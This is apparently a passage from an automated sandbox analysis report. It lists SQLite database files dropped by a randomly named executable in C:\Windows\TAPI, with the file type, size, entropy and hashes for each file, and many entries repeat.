                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
